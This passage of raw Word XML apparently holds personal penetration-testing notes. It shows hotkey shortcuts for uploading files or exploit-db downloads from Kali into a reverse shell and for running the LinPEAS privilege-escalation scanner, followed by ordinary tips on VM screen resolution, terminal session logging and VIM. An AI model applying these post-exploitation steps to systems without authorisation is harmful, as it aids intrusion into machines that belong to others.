          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can edit the path relative to the working directory to upload any file on your kali to reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload http://exploitdb….</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B08">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run LinPEAS in the background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fn + F12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run peass_ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This opens up a gnome-terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't already have gnome-terminal, here is how to download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1302"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install gnome-terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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12">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rni6mdd2v99s" w:id="546"/>
      <w:bookmarkEnd w:id="546"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view and change resolution of VM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To view the resolution in VM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1307"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xrandr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To change it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xrandr --output Virtual1 --mode 1600x900</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For VMWARE, I like having </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1600x900</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then in my VM settings I have the maximum resolution set as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3840x2160</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On virtual box, I have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1646x915 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which seems to the best one for virtual box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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1F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i0e7od8otbx1" w:id="547"/>
      <w:bookmarkEnd w:id="547"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever want to save your command and output to a file, this is how you do it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Every time you open a tab, run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script -af ~/chat.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then whenever you type in something, it will save it to a file in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/chat.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once you want to read it, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ansi2txt &lt; chat.log &gt; chat_clean.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subl chat_clean.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="864"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's still kind of buggy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To stop the logging:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Either close the tab, or…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>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3B2F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B32">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cia3c0j127fo" w:id="548"/>
      <w:bookmarkEnd w:id="548"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1388">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://vimschool.netlify.app/introduction/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B34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B35">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0. Configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to add line numbers to configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B37">
      <w:pPr>
        <w:numPr>
